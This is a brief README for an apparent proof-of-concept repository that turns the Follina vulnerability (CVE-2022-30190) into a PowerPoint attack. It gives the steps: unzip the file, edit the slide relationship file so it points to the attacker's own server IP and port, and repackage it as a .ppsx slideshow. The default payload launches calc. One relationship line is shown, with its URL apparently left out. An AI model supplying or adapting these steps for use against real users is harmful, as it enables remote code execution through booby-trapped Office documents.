# CVE-2022-30190(Follina)-PowerPoint-Version

This is CVE-2022-30190(follina) on powerpoint version

Modify the suffix of the file to 'pptx' and unzip the file, you can edit `\ppt\slides\_rels\slide1.xml.rels` and replace to your vps ip:port like this, then compress them as the same way and change the suffix to 'ppsx'. The default payload is to execute the `calc`.

<Relationship TargetMode="External" Id="rId3"  Type=""  Target="mhtml:!x-usc:"/>